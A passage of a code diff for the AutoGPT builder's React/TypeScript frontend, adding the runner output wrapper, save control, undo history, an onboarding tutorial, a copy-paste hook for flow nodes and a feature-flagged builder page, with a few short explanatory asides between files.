<Label className="text-base font-semibold">
{output.metadata.name || "Unnamed Output"}
</Label>
{output.metadata.description && (
<Label className="block text-sm text-gray-600">
{output.metadata.description}
</Label>
)}
<div className="group relative rounded-md bg-gray-100 p-2">
<Button
className="absolute right-1 top-1 z-10 m-1 hidden p-2 group-hover:block"
variant="outline"
size="icon"
onClick={() =>
copyOutput(
output.metadata.name || "Unnamed Output",
output.result,
)
}
title="Copy Output"
>
<Clipboard size={18} />
</Button>
<Textarea
readOnly
value={formatOutput(output.result ?? "No output yet")}
className="w-full resize-none whitespace-pre-wrap break-words border-none bg-transparent text-sm"
style={{
height: "auto",
minHeight: "2.5rem",
maxHeight: "400px",
}}
ref={(el) => {
if (el) {
adjustTextareaHeight(el);
if (el.scrollHeight > 400) {
el.style.height = "400px";
}
}
}}
/>
</div>
</div>
))
) : (
<p>No output blocks available.</p>
)}
</div>
</ScrollArea>
</div>
</SheetContent>
</Sheet>
);
}
export default RunnerOutputUI;

View File

@@ -0,0 +1,117 @@
import React, {
useState,
forwardRef,
useImperativeHandle,
useMemo,
} from "react";
import { Node } from "@xyflow/react";
import { CustomNodeData } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import {
BlockUIType,
CredentialsMetaInput,
Graph,
} from "@/lib/autogpt-server-api/types";
import RunnerOutputUI, { OutputNodeInfo } from "./RunnerOutputUI";
import { RunnerInputDialog } from "./RunnerInputUI";
interface RunnerUIWrapperProps {
graph: Graph;
nodes: Node<CustomNodeData>[];
graphExecutionError?: string | null;
saveAndRun: (
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => void;
createRunSchedule: (
cronExpression: string,
scheduleName: string,
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => Promise<void>;
}
export interface RunnerUIWrapperRef {
openRunInputDialog: () => void;
openRunnerOutput: () => void;
runOrOpenInput: () => void;
}
const RunnerUIWrapper = forwardRef<RunnerUIWrapperRef, RunnerUIWrapperProps>(
(
{ graph, nodes, graphExecutionError, saveAndRun, createRunSchedule },
ref,
) => {
const [isRunInputDialogOpen, setIsRunInputDialogOpen] = useState(false);
const [isRunnerOutputOpen, setIsRunnerOutputOpen] = useState(false);
const graphInputs = graph.input_schema.properties;
const graphOutputs = useMemo((): OutputNodeInfo[] => {
const outputNodes = nodes.filter(
(node) => node.data.uiType === BlockUIType.OUTPUT,
);
return outputNodes.map(
(node) =>
({
metadata: {
name: node.data.hardcodedValues.name || "Output",
description:
node.data.hardcodedValues.description ||
"Output from the agent",
},
result:
(node.data.executionResults as any)
?.map((result: any) => result?.data?.output)
.join("\n--\n") || "No output yet",
}) satisfies OutputNodeInfo,
);
}, [nodes]);
const openRunInputDialog = () => setIsRunInputDialogOpen(true);
const openRunnerOutput = () => setIsRunnerOutputOpen(true);
const runOrOpenInput = () => {
if (
Object.keys(graphInputs).length > 0 ||
Object.keys(graph.credentials_input_schema.properties).length > 0
) {
openRunInputDialog();
} else {
saveAndRun({}, {});
}
};
useImperativeHandle(
ref,
() =>
({
openRunInputDialog,
openRunnerOutput,
runOrOpenInput,
}) satisfies RunnerUIWrapperRef,
);
return (
<>
<RunnerInputDialog
isOpen={isRunInputDialogOpen}
doClose={() => setIsRunInputDialogOpen(false)}
graph={graph}
doRun={saveAndRun}
doCreateSchedule={createRunSchedule}
/>
<RunnerOutputUI
isOpen={isRunnerOutputOpen}
doClose={() => setIsRunnerOutputOpen(false)}
outputs={graphOutputs}
graphExecutionError={graphExecutionError}
/>
</>
);
},
);
RunnerUIWrapper.displayName = "RunnerUIWrapper";
export default RunnerUIWrapper;

View File

@@ -0,0 +1,217 @@
import React, { useEffect, useState } from "react";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import { Card, CardContent, CardFooter } from "@/components/__legacy__/ui/card";
import { Input } from "@/components/__legacy__/ui/input";
import { Button } from "@/components/__legacy__/ui/button";
import { GraphMeta } from "@/lib/autogpt-server-api";
import { Label } from "@/components/__legacy__/ui/label";
import { IconSave } from "@/components/__legacy__/ui/icons";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { useToast } from "@/components/molecules/Toast/use-toast";
import { useQueryClient } from "@tanstack/react-query";
import { getGetV2ListMySubmissionsQueryKey } from "@/app/api/__generated__/endpoints/store/store";
import { CronExpressionDialog } from "@/app/(platform)/library/agents/[id]/components/OldAgentLibraryView/components/cron-scheduler-dialog";
import { humanizeCronExpression } from "@/lib/cron-expression-utils";
import { CalendarClockIcon } from "lucide-react";
interface SaveControlProps {
agentMeta: GraphMeta | null;
agentName: string;
agentDescription: string;
agentRecommendedScheduleCron: string;
canSave: boolean;
onSave: () => Promise<void>;
onNameChange: (name: string) => void;
onDescriptionChange: (description: string) => void;
onRecommendedScheduleCronChange: (cron: string) => void;
pinSavePopover: boolean;
}
/**
* A SaveControl component to be used within the ControlPanel. It allows the user to save the agent.
* @param {Object} SaveControlProps - The properties of the SaveControl component.
* @param {GraphMeta | null} SaveControlProps.agentMeta - The agent's metadata, or null if creating a new agent.
* @param {string} SaveControlProps.agentName - The agent's name.
* @param {string} SaveControlProps.agentDescription - The agent's description.
* @param {string} SaveControlProps.agentRecommendedScheduleCron - The agent's recommended run schedule, as a cron expression.
* @param {boolean} SaveControlProps.canSave - Whether the button to save the agent should be enabled.
* @param {() => Promise<void>} SaveControlProps.onSave - Function to save the agent.
* @param {(name: string) => void} SaveControlProps.onNameChange - Function to handle name changes.
* @param {(description: string) => void} SaveControlProps.onDescriptionChange - Function to handle description changes.
* @param {(cron: string) => void} SaveControlProps.onRecommendedScheduleCronChange - Function to handle changes to the recommended schedule.
* @param {boolean} SaveControlProps.pinSavePopover - Whether to keep the save popover pinned open (used by the tutorial).
* @returns The SaveControl component.
*/
export const SaveControl = ({
agentMeta,
canSave,
onSave,
agentName,
onNameChange,
agentDescription,
onDescriptionChange,
agentRecommendedScheduleCron,
onRecommendedScheduleCronChange,
pinSavePopover,
}: SaveControlProps) => {
/**
* Note for improvement:
* At the moment we rely on onNameChange and onDescriptionChange to propagate edits to the agent's name and description.
* This should be migrated to proper form controls backed by a form library.
*/
const { toast } = useToast();
const queryClient = useQueryClient();
const [cronScheduleDialogOpen, setCronScheduleDialogOpen] = useState(false);
const handleScheduleChange = (cronExpression: string) => {
onRecommendedScheduleCronChange(cronExpression);
};
useEffect(() => {
const handleKeyDown = async (event: KeyboardEvent) => {
if ((event.ctrlKey || event.metaKey) && event.key === "s") {
event.preventDefault(); // Stop the browser default action
await onSave(); // Call your save function
queryClient.invalidateQueries({
queryKey: getGetV2ListMySubmissionsQueryKey(),
});
toast({
duration: 2000,
title: "All changes saved successfully!",
});
}
};
window.addEventListener("keydown", handleKeyDown);
return () => {
window.removeEventListener("keydown", handleKeyDown);
};
}, [onSave, toast, queryClient]);
return (
<Popover open={pinSavePopover ? true : undefined}>
<Tooltip delayDuration={500}>
<TooltipTrigger asChild>
<PopoverTrigger asChild>
<Button
variant="ghost"
size="icon"
data-id="save-control-popover-trigger"
data-testid="blocks-control-save-button"
name="Save"
>
<IconSave className="dark:text-gray-300" />
</Button>
</PopoverTrigger>
</TooltipTrigger>
<TooltipContent side="right">Save</TooltipContent>
</Tooltip>
<PopoverContent
side="right"
sideOffset={15}
align="start"
data-id="save-control-popover-content"
className="w-96 max-w-[400px]"
>
<Card className="border-none shadow-none dark:bg-slate-900">
<CardContent className="p-4">
<div className="space-y-3">
<div>
<Label htmlFor="name" className="dark:text-gray-300">
Name
</Label>
<Input
id="name"
placeholder="Enter your agent name"
value={agentName}
onChange={(e) => onNameChange(e.target.value)}
data-id="save-control-name-input"
data-testid="save-control-name-input"
maxLength={100}
className="mt-1"
/>
</div>
<div>
<Label htmlFor="description" className="dark:text-gray-300">
Description
</Label>
<Input
id="description"
placeholder="Your agent description"
value={agentDescription}
onChange={(e) => onDescriptionChange(e.target.value)}
data-id="save-control-description-input"
data-testid="save-control-description-input"
maxLength={500}
className="mt-1"
/>
</div>
<div>
<Label className="dark:text-gray-300">
Recommended Schedule
</Label>
<Button
variant="outline"
onClick={() => setCronScheduleDialogOpen(true)}
className="mt-1 w-full min-w-0 justify-start text-sm"
data-id="save-control-recommended-schedule-button"
data-testid="save-control-recommended-schedule-button"
>
<CalendarClockIcon className="mr-2 h-4 w-4 flex-shrink-0" />
<span className="min-w-0 flex-1 truncate">
{agentRecommendedScheduleCron
? humanizeCronExpression(agentRecommendedScheduleCron)
: "Set schedule"}
</span>
</Button>
</div>
{agentMeta?.version && (
<div>
<Label htmlFor="version" className="dark:text-gray-300">
Version
</Label>
<Input
id="version"
placeholder="Version"
value={agentMeta?.version || "-"}
disabled
data-testid="save-control-version-output"
className="mt-1"
/>
</div>
)}
</div>
</CardContent>
<CardFooter className="flex flex-col items-stretch gap-2">
<Button
className="w-full dark:bg-slate-700 dark:text-slate-100 dark:hover:bg-slate-800"
onClick={onSave}
data-id="save-control-save-agent"
data-testid="save-control-save-agent-button"
disabled={!canSave}
>
Save Agent
</Button>
</CardFooter>
</Card>
</PopoverContent>
<CronExpressionDialog
open={cronScheduleDialogOpen}
setOpen={setCronScheduleDialogOpen}
onSubmit={handleScheduleChange}
defaultCronExpression={agentRecommendedScheduleCron}
title="Recommended Schedule"
/>
</Popover>
);
};
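
Aside: the "Note for improvement" above suggests moving the name/description fields onto form controls backed by a form library. A rough, hypothetical sketch of what that could look like with react-hook-form — none of these names exist in the codebase, and a real migration would also cover the schedule field:

import { useForm } from "react-hook-form";

type AgentDetailsForm = { name: string; description: string };

// Hypothetical wiring: the controlled Inputs above would become registered fields,
// and form.handleSubmit would wrap onSave instead of the manual Ctrl+S / button handlers.
function useAgentDetailsForm(
  defaults: AgentDetailsForm,
  onSave: (values: AgentDetailsForm) => Promise<void>,
) {
  const form = useForm<AgentDetailsForm>({ defaultValues: defaults });
  // e.g. <form onSubmit={submit}> ... <Input {...form.register("name")} />
  const submit = form.handleSubmit(onSave);
  return { form, submit };
}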

View File

@@ -0,0 +1,95 @@
import { CustomNodeData } from "./CustomNode/CustomNode";
import { CustomEdgeData } from "./CustomEdge/CustomEdge";
import { Edge } from "@xyflow/react";
type ActionType =
| "ADD_NODE"
| "DELETE_NODE"
| "ADD_EDGE"
| "DELETE_EDGE"
| "UPDATE_NODE"
| "MOVE_NODE"
| "UPDATE_INPUT"
| "UPDATE_NODE_POSITION";
type AddNodePayload = { node: CustomNodeData };
type DeleteNodePayload = { nodeId: string };
type AddEdgePayload = { edge: Edge<CustomEdgeData> };
type DeleteEdgePayload = { edgeId: string };
type UpdateNodePayload = { nodeId: string; newData: Partial<CustomNodeData> };
type MoveNodePayload = { nodeId: string; position: { x: number; y: number } };
type UpdateInputPayload = {
nodeId: string;
oldValues: { [key: string]: any };
newValues: { [key: string]: any };
};
type UpdateNodePositionPayload = {
nodeId: string;
oldPosition: { x: number; y: number };
newPosition: { x: number; y: number };
};
type ActionPayload =
| AddNodePayload
| DeleteNodePayload
| AddEdgePayload
| DeleteEdgePayload
| UpdateNodePayload
| MoveNodePayload
| UpdateInputPayload
| UpdateNodePositionPayload;
type Action = {
type: ActionType;
payload: ActionPayload;
undo: () => void;
redo: () => void;
};
class History {
private past: Action[] = [];
private future: Action[] = [];
push(action: Action) {
this.past.push(action);
this.future = [];
}
undo() {
const action = this.past.pop();
if (action) {
action.undo();
this.future.push(action);
}
}
redo() {
const action = this.future.pop();
if (action) {
action.redo();
this.past.push(action);
}
}
canUndo(): boolean {
return this.past.length > 0;
}
canRedo(): boolean {
return this.future.length > 0;
}
clear() {
this.past = [];
this.future = [];
}
getHistoryState() {
return {
past: [...this.past],
future: [...this.future],
};
}
}
export const history = new History();
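
Aside: a minimal sketch of how the editor might record an undoable action with this singleton — addNode and removeNode are hypothetical stand-ins for whatever setters the flow editor actually uses:

// Hypothetical usage sketch (addNode/removeNode are illustrative, not defined in this file):
function recordAddNode(
  node: CustomNodeData,
  nodeId: string,
  addNode: (n: CustomNodeData) => void,
  removeNode: (id: string) => void,
) {
  history.push({
    type: "ADD_NODE",
    payload: { node },
    undo: () => removeNode(nodeId), // revert: remove the node again
    redo: () => addNode(node), // re-apply: add the same node back
  });
}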

View File

@@ -0,0 +1,569 @@
import Shepherd from "shepherd.js";
import "shepherd.js/dist/css/shepherd.css";
import { Key, storage } from "@/services/storage/local-storage";
import { analytics } from "@/services/analytics";
export const startTutorial = (
emptyNodeList: (forceEmpty: boolean) => boolean,
setPinBlocksPopover: (value: boolean) => void,
setPinSavePopover: (value: boolean) => void,
) => {
const tour = new Shepherd.Tour({
useModalOverlay: true,
defaultStepOptions: {
cancelIcon: { enabled: true },
scrollTo: { behavior: "smooth", block: "center" },
},
});
// CSS classes for disabling and highlighting blocks
const disableClass = "disable-blocks";
const highlightClass = "highlight-block";
let isConnecting = false;
// Helper function to disable all blocks except the target block
const disableOtherBlocks = (targetBlockSelector: string) => {
document.querySelectorAll('[data-id^="block-card-"]').forEach((block) => {
block.classList.toggle(disableClass, !block.matches(targetBlockSelector));
block.classList.toggle(
highlightClass,
block.matches(targetBlockSelector),
);
});
};
// Helper function to enable all blocks
const enableAllBlocks = () => {
document.querySelectorAll('[data-id^="block-card-"]').forEach((block) => {
block.classList.remove(disableClass, highlightClass);
});
};
// Inject CSS for disabling and highlighting blocks
const injectStyles = () => {
const style = document.createElement("style");
style.textContent = `
.${disableClass} {
pointer-events: none;
opacity: 0.5;
}
.${highlightClass} {
background-color: #ffeb3b;
border: 2px solid #fbc02d;
transition: background-color 0.3s, border-color 0.3s;
}
`;
document.head.appendChild(style);
};
// Helper function to check if an element is present in the DOM
const waitForElement = (selector: string): Promise<void> => {
return new Promise((resolve) => {
const checkElement = () => {
if (document.querySelector(selector)) {
resolve();
} else {
setTimeout(checkElement, 10);
}
};
checkElement();
});
};
// Function to detect the correct connection and advance the tour
const detectConnection = () => {
const checkForConnection = () => {
const correctConnection = document.querySelector(
'[data-testid^="rf__edge-"]',
);
if (correctConnection) {
tour.show("press-run-again");
} else {
setTimeout(checkForConnection, 100);
}
};
checkForConnection();
};
// Define state management functions to handle connection state
function startConnecting() {
isConnecting = true;
}
function stopConnecting() {
isConnecting = false;
}
// Reset connection state when revisiting the step
function resetConnectionState() {
stopConnecting();
}
// Event handlers for mouse down and up to manage connection state
function handleMouseDown() {
startConnecting();
setTimeout(() => {
if (isConnecting) {
tour.next();
}
}, 100);
}
// Event handler for mouse up to check if the connection was successful
function handleMouseUp(event: { target: any }) {
const target = event.target;
const validConnectionPoint = document.querySelector(
'[data-testid^="rf__node-"]:nth-child(2) [data-id$="-a-target"]',
);
if (validConnectionPoint && !validConnectionPoint.contains(target)) {
setTimeout(() => {
if (!document.querySelector('[data-testid^="rf__edge-"]')) {
stopConnecting();
tour.show("connect-blocks-output");
}
}, 200);
} else {
stopConnecting();
}
}
// Define the fitViewToScreen function
const fitViewToScreen = () => {
const fitViewButton = document.querySelector(
".react-flow__controls-fitview",
) as HTMLButtonElement;
if (fitViewButton) {
fitViewButton.click();
}
};
injectStyles();
const warningText = emptyNodeList(false)
? ""
: "<br/><br/><b>Caution: Clicking next will start a tutorial and will clear the current flow.</b>";
tour.addStep({
id: "starting-step",
title: "Welcome to the Tutorial",
text: `This is the AutoGPT builder! ${warningText}`,
buttons: [
{
text: "Skip Tutorial",
action: () => {
tour.cancel(); // Ends the tour
storage.set(Key.SHEPHERD_TOUR, "skipped"); // Set the tutorial as skipped in local storage
},
classes: "shepherd-button-secondary", // Optionally add a class for styling the skip button differently
},
{
text: "Next",
action: () => {
emptyNodeList(true);
tour.next();
},
},
],
});
tour.addStep({
id: "open-block-step",
title: "Open Blocks Menu",
text: "Please click the block button to open the blocks menu.",
attachTo: {
element: '[data-id="blocks-control-popover-trigger"]',
on: "right",
},
advanceOn: {
selector: '[data-id="blocks-control-popover-trigger"]',
event: "click",
},
buttons: [],
});
tour.addStep({
id: "scroll-block-menu",
title: "Scroll Down or Search",
text: 'Scroll down or search in the blocks menu for the "Calculator Block" and press the block to add it.',
attachTo: {
element: '[data-id="blocks-control-popover-content"]',
on: "right",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-id="blocks-control-popover-content"]').then(() => {
disableOtherBlocks(
'[data-id="block-card-b1ab9b19-67a6-406d-abf5-2dba76d00c79"]',
);
}),
advanceOn: {
selector: '[data-id="block-card-b1ab9b19-67a6-406d-abf5-2dba76d00c79"]',
event: "click",
},
when: {
show: () => setPinBlocksPopover(true),
hide: enableAllBlocks,
},
});
tour.addStep({
id: "focus-new-block",
title: "New Block",
text: "This is the Calculator Block! Let's go over how it works.",
attachTo: { element: `[data-id="custom-node-1"]`, on: "left" },
beforeShowPromise: () => waitForElement('[data-id="custom-node-1"]'),
buttons: [
{
text: "Next",
action: tour.next,
},
],
when: {
show: () => {
setPinBlocksPopover(false);
setTimeout(() => {
fitViewToScreen();
}, 100);
},
},
});
tour.addStep({
id: "input-to-block",
title: "Input to the Block",
text: "This is the input pin for the block. You can input the output of other blocks here; this block takes numbers as input.",
attachTo: { element: '[data-nodeid="1"]', on: "left" },
buttons: [
{
text: "Back",
action: tour.back,
},
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "output-from-block",
title: "Output from the Block",
text: "This is the output pin for the block. You can connect this to another block to pass the output along.",
attachTo: { element: '[data-handlepos="right"]', on: "right" },
buttons: [
{
text: "Back",
action: tour.back,
},
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "select-operation-and-input",
title: "Select Operation and Input Numbers",
text: "Select any mathematical operation you'd like to perform, and enter numbers in both input fields.",
attachTo: { element: '[data-id="input-handles"]', on: "right" },
buttons: [
{
text: "Back",
action: tour.back,
},
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "press-initial-save-button",
title: "Press Save",
text: "First we need to save the flow before we can run it!",
attachTo: {
element: '[data-id="save-control-popover-trigger"]',
on: "left",
},
advanceOn: {
selector: '[data-id="save-control-popover-trigger"]',
event: "click",
},
buttons: [
{
text: "Back",
action: tour.back,
},
],
when: {
hide: () => setPinSavePopover(true),
},
});
tour.addStep({
id: "save-agent-details",
title: "Save the Agent",
text: "Enter a name for your agent, add an optional description, and then click 'Save agent' to save your flow.",
attachTo: {
element: '[data-id="save-control-popover-content"]',
on: "top",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-id="save-control-popover-content"]'),
advanceOn: {
selector: '[data-id="save-control-save-agent"]',
event: "click",
},
when: {
hide: () => setPinSavePopover(false),
},
});
tour.addStep({
id: "press-run",
title: "Press Run",
text: "Start your first flow by pressing the Run button!",
attachTo: {
element: '[data-tutorial-id="primary-action-run-agent"]',
on: "top",
},
advanceOn: {
selector: '[data-tutorial-id="primary-action-run-agent"]',
event: "click",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-tutorial-id="primary-action-run-agent"]'),
when: {
hide: () => {
setTimeout(() => {
fitViewToScreen();
}, 500);
},
},
});
tour.addStep({
id: "wait-for-processing",
title: "Processing",
text: "Let's wait for the block to finish being processed...",
attachTo: {
element: '[data-id^="badge-"][data-id$="-QUEUED"]',
on: "bottom",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-id^="badge-"][data-id$="-QUEUED"]').then(
fitViewToScreen,
),
when: {
show: () => {
waitForElement('[data-id^="badge-"][data-id$="-COMPLETED"]').then(
() => {
tour.next();
},
);
},
},
});
tour.addStep({
id: "check-output",
title: "Check the Output",
text: "Check here to see the output of the block after running the flow.",
attachTo: { element: '[data-id="latest-output"]', on: "top" },
beforeShowPromise: () =>
new Promise((resolve) => {
setTimeout(() => {
waitForElement('[data-id="latest-output"]').then(resolve);
}, 100);
}),
buttons: [
{
text: "Next",
action: tour.next,
},
],
when: {
show: () => {
fitViewToScreen();
},
},
});
tour.addStep({
id: "copy-paste-block",
title: "Copy and Paste the Block",
text: "Lets duplicate this block. Click and hold the block with your mouse, then press Ctrl+C (Cmd+C on Mac) to copy and Ctrl+V (Cmd+V on Mac) to paste.",
attachTo: { element: '[data-testid^="rf__node-"]', on: "top" },
buttons: [
{
text: "Back",
action: tour.back,
},
],
when: {
show: () => {
fitViewToScreen();
waitForElement('[data-testid^="rf__node-"]:nth-child(2)').then(() => {
tour.next();
});
},
},
});
tour.addStep({
id: "focus-second-block",
title: "Focus on the New Block",
text: "This is your copied Calculator Block. Now, lets move it to the side of the first block.",
attachTo: { element: '[data-testid^="rf__node-"]:nth-child(2)', on: "top" },
beforeShowPromise: () =>
waitForElement('[data-testid^="rf__node-"]:nth-child(2)'),
buttons: [
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "connect-blocks-output",
title: "Connect the Blocks: Output",
text: "Now, let's connect the output of the first Calculator Block to the input of the second Calculator Block. Drag from the output pin of the first block to the input pin (A) of the second block.",
attachTo: {
element:
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
on: "bottom",
},
buttons: [
{
text: "Back",
action: tour.back,
},
],
beforeShowPromise: () => {
return waitForElement(
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
);
},
when: {
show: () => {
fitViewToScreen();
resetConnectionState(); // Reset state when revisiting this step
tour.modal.show();
const outputPin = document.querySelector(
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
);
if (outputPin) {
outputPin.addEventListener("mousedown", handleMouseDown);
}
},
hide: () => {
const outputPin = document.querySelector(
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
);
if (outputPin) {
outputPin.removeEventListener("mousedown", handleMouseDown);
}
},
},
});
tour.addStep({
id: "connect-blocks-input",
title: "Connect the Blocks: Input",
text: "Now, connect the output to the input pin of the second block (A).",
attachTo: {
element: '[data-testid^="rf__node-"]:nth-child(2) [data-id$="-a-target"]',
on: "top",
},
buttons: [],
beforeShowPromise: () => {
return waitForElement(
'[data-testid^="rf__node-"]:nth-child(2) [data-id$="-a-target"]',
).then(() => {
detectConnection();
});
},
when: {
show: () => {
tour.modal.show();
document.addEventListener("mouseup", handleMouseUp, true);
},
hide: () => {
tour.modal.hide();
document.removeEventListener("mouseup", handleMouseUp, true);
},
},
});
tour.addStep({
id: "press-run-again",
title: "Press Run Again",
text: "Now, press the Run button again to execute the flow with the new Calculator Block added!",
attachTo: {
element: '[data-tutorial-id="primary-action-run-agent"]',
on: "top",
},
advanceOn: {
selector: '[data-tutorial-id="primary-action-run-agent"]',
event: "click",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-tutorial-id="primary-action-run-agent"]'),
when: {
hide: () => {
setTimeout(() => {
fitViewToScreen();
}, 500);
},
},
});
tour.addStep({
id: "congratulations",
title: "Congratulations!",
text: "You have successfully created your first flow. Watch for the outputs in the blocks!",
beforeShowPromise: () => waitForElement('[data-id="latest-output"]'),
when: {
show: () => tour.modal.hide(),
},
buttons: [
{
text: "Finish",
action: tour.complete,
},
],
});
// Unpin blocks and save menu when the tour is completed or canceled
tour.on("complete", () => {
setPinBlocksPopover(false);
setPinSavePopover(false);
storage.set(Key.SHEPHERD_TOUR, "completed"); // Optionally mark the tutorial as completed
});
for (const step of tour.steps) {
step.on("show", () => {
console.debug("sendTutorialStep");
analytics.sendGAEvent("event", "tutorial_step_shown", { value: step.id });
});
}
tour.on("cancel", () => {
setPinBlocksPopover(false);
setPinSavePopover(false);
storage.set(Key.SHEPHERD_TOUR, "canceled"); // Optionally mark the tutorial as canceled
});
tour.start();
};
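
Aside: the tour writes its completion state to Key.SHEPHERD_TOUR, which suggests callers gate on that key. A hypothetical caller sketch (the gating itself is not shown in this diff):

// Hypothetical: only start the tour if the user hasn't completed, skipped, or canceled it before.
export function maybeStartTutorial(
  emptyNodeList: (forceEmpty: boolean) => boolean,
  setPinBlocksPopover: (value: boolean) => void,
  setPinSavePopover: (value: boolean) => void,
) {
  if (!storage.get(Key.SHEPHERD_TOUR)) {
    startTutorial(emptyNodeList, setPinBlocksPopover, setPinSavePopover);
  }
}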

View File

@@ -0,0 +1,142 @@
import { useCallback } from "react";
import { Node, Edge, useReactFlow } from "@xyflow/react";
import { Key, storage } from "@/services/storage/local-storage";
import { ConnectedEdge } from "./CustomNode/CustomNode";
interface CopyableData {
nodes: Node[];
edges: Edge[];
}
export function useCopyPaste(getNextNodeId: () => string) {
const { setNodes, addEdges, getNodes, getEdges, getViewport } =
useReactFlow();
const handleCopyPaste = useCallback(
(event: KeyboardEvent) => {
if (event.ctrlKey || event.metaKey) {
if (event.key === "c" || event.key === "C") {
const selectedNodes = getNodes().filter((node) => node.selected);
const selectedNodeIds = new Set(selectedNodes.map((node) => node.id));
// Only copy edges where both source and target nodes are selected
const selectedEdges = getEdges().filter(
(edge) =>
edge.selected &&
selectedNodeIds.has(edge.source) &&
selectedNodeIds.has(edge.target),
);
const copiedData: CopyableData = {
nodes: selectedNodes.map((node) => ({
...node,
data: {
...node.data,
connections: node.data.connections || [], // Preserve connections
},
})),
edges: selectedEdges,
};
storage.set(Key.COPIED_FLOW_DATA, JSON.stringify(copiedData));
}
if (event.key === "v" || event.key === "V") {
const copiedDataString = storage.get(Key.COPIED_FLOW_DATA);
if (copiedDataString) {
const copiedData = JSON.parse(copiedDataString) as CopyableData;
const oldToNewIdMap: Record<string, string> = {};
// Get fresh viewport values at paste time to ensure correct positioning
const { x, y, zoom } = getViewport();
const viewportCenter = {
x: (window.innerWidth / 2 - x) / zoom,
y: (window.innerHeight / 2 - y) / zoom,
};
let minX = Infinity,
minY = Infinity,
maxX = -Infinity,
maxY = -Infinity;
copiedData.nodes.forEach((node: Node) => {
minX = Math.min(minX, node.position.x);
minY = Math.min(minY, node.position.y);
maxX = Math.max(maxX, node.position.x);
maxY = Math.max(maxY, node.position.y);
});
const offsetX = viewportCenter.x - (minX + maxX) / 2;
const offsetY = viewportCenter.y - (minY + maxY) / 2;
const pastedNodes = copiedData.nodes.map((node: Node) => {
const newNodeId = getNextNodeId();
oldToNewIdMap[node.id] = newNodeId;
return {
...node,
id: newNodeId, // Generate unique ID for the pasted node
selected: true, // Select the pasted nodes so they're visible
position: {
x: node.position.x + offsetX,
y: node.position.y + offsetY,
},
data: {
...node.data,
backend_id: undefined, // Clear backend_id so the new node.id is used when saving
connections: node.data.connections || [], // Preserve connections
status: undefined,
executionResults: undefined,
},
};
});
const pastedEdges = copiedData.edges.map((edge) => {
const newSourceId = oldToNewIdMap[edge.source] ?? edge.source;
const newTargetId = oldToNewIdMap[edge.target] ?? edge.target;
return {
...edge,
id: `${newSourceId}_${edge.sourceHandle}_${newTargetId}_${edge.targetHandle}_${Date.now()}`,
source: newSourceId,
target: newTargetId,
};
});
setNodes((existingNodes) => [
...existingNodes.map((node) => ({ ...node, selected: false })),
...pastedNodes,
]);
addEdges(pastedEdges);
setNodes((nodes) => {
return nodes.map((node) => {
const nodeConnections = getEdges()
.filter(
(edge: Edge) =>
edge.source === node.id || edge.target === node.id,
)
.map(
(edge: Edge): ConnectedEdge => ({
id: edge.id,
source: edge.source,
target: edge.target,
sourceHandle: edge.sourceHandle!,
targetHandle: edge.targetHandle!,
}),
);
return {
...node,
data: {
...node.data,
connections: nodeConnections,
},
};
});
});
}
}
}
},
[setNodes, addEdges, getNodes, getEdges, getNextNodeId, getViewport],
);
return handleCopyPaste;
}
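
Aside: the hook only returns the keydown handler; a minimal sketch of how a consumer could register it globally (the consuming component isn't part of this diff):

import { useEffect } from "react";

// Hypothetical consumer: attach the handler to window so Ctrl/Cmd+C and Ctrl/Cmd+V work anywhere on the canvas.
function useCopyPasteShortcuts(getNextNodeId: () => string) {
  const handleCopyPaste = useCopyPaste(getNextNodeId);
  useEffect(() => {
    window.addEventListener("keydown", handleCopyPaste);
    return () => window.removeEventListener("keydown", handleCopyPaste);
  }, [handleCopyPaste]);
}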

View File

@@ -1,13 +1,64 @@
"use client";
import { ReactFlowProvider } from "@xyflow/react";
import { Flow } from "./components/FlowEditor/Flow/Flow";
export default function BuilderPage() {
import FlowEditor from "@/app/(platform)/build/components/legacy-builder/Flow/Flow";
import { useOnboarding } from "@/providers/onboarding/onboarding-provider";
// import LoadingBox from "@/components/__legacy__/ui/loading";
import { GraphID } from "@/lib/autogpt-server-api/types";
import { ReactFlowProvider } from "@xyflow/react";
import { useSearchParams } from "next/navigation";
import { useEffect } from "react";
import { BuilderViewTabs } from "./components/BuilderViewTabs/BuilderViewTabs";
import { Flow } from "./components/FlowEditor/Flow/Flow";
import { useBuilderView } from "./useBuilderView";
function BuilderContent() {
const query = useSearchParams();
const { completeStep } = useOnboarding();
useEffect(() => {
completeStep("BUILDER_OPEN");
}, [completeStep]);
const _graphVersion = query.get("flowVersion");
const graphVersion = _graphVersion ? parseInt(_graphVersion) : undefined;
return (
<div className="relative h-full w-full">
<ReactFlowProvider>
<Flow />
</ReactFlowProvider>
</div>
<FlowEditor
className="flex h-full w-full"
flowID={(query.get("flowID") as GraphID | null) ?? undefined}
flowVersion={graphVersion}
/>
);
}
export default function BuilderPage() {
const {
isSwitchEnabled,
selectedView,
setSelectedView,
isNewFlowEditorEnabled,
} = useBuilderView();
// Switch is temporary, we will remove it once our new flow editor is ready
if (isSwitchEnabled) {
return (
<div className="relative h-full w-full">
<BuilderViewTabs value={selectedView} onChange={setSelectedView} />
{selectedView === "new" ? (
<ReactFlowProvider>
<Flow />
</ReactFlowProvider>
) : (
<BuilderContent />
)}
</div>
);
}
return isNewFlowEditorEnabled ? (
<ReactFlowProvider>
<Flow />
</ReactFlowProvider>
) : (
<BuilderContent />
);
}

View File

@@ -0,0 +1,44 @@
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { usePathname, useRouter, useSearchParams } from "next/navigation";
import { useEffect, useMemo } from "react";
